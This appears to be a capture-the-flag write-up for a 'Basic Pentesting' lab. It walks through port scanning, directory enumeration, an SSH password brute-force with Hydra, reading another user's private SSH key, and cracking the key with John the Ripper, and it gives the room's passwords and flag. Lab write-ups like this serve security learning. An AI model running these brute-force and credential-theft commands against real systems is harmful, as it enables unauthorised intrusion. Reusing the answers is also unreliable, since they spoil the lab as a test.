Basic Pentesting

Target IP: 10.10.41.135

1. Scanning for Open Ports

Using nmap, the following ports were discovered:

• 22 → SSH (accessible)

• 80 → HTTP (web service available)

• 139 → NetBIOS

• 445 → SMB

---

2. Web Enumeration

• Accessed the website via a browser.

• Checked the page source and found a hint about a hidden directory.

• Used gobuster to discover hidden directories:

  gobuster dir -u http://10.10.41.135 -w /usr/share/wordlists/dirb/common.txt

  • Hidden directory found: development

  

Source Code

---

3. User Enumeration & Brute-Forcing

Enumerating users using enum4linux:

enum4linux -a 10.10.41.135 

[ -a Do all simple enumeration (-U -S -G -P -r -o -n -i)  ]

- Found two users on the system

• The first user: jan

Brute-forcing SSH password using Hydra:

hydra -l jan -P /usr/share/wordlists/rockyou.txt.gz ssh://10.10.41.135

• Discovered password: armando

Service used to access the server: SSH

---

4. Privilege Escalation

1. System Enumeration using linPEAS

• Transferred linpeas.sh to the target machine:

  scp linpeas.sh jan@10.10.41.135:/dev/shm

Copy linpeas To Victim Account

• Found another user: kay, but lacked permissions to access their files.

2. Gaining Root Access

• Inside kay's home directory, an RSA private key was found:

cat /home/kay/.ssh/id_rsa

The key was password-protected, so it needed to be cracked.

• Converted the RSA key to a hash format using ssh2john:

  ssh2john RSA_PASS > MEOW_RSA.hash

• Cracked the password using John the Ripper:

  john --wordlist=/usr/share/wordlists/rockyou.txt MEOW_RSA.hash

• Discovered password: beeswax

3. Switching to Kay’s User Account

• Changed the permissions for the RSA key:

  chmod 600 RSA_PASS

• Used the key to log in as kay:

  ssh -i RSA_PASS kay@10.10.41.135

• Confirmed user: kay

  pwd

• Found the final flag inside pass.bak:

  cat pass.bak

  Flag: heresareallystrongpasswordthatfollowsthepasswordpolicy$$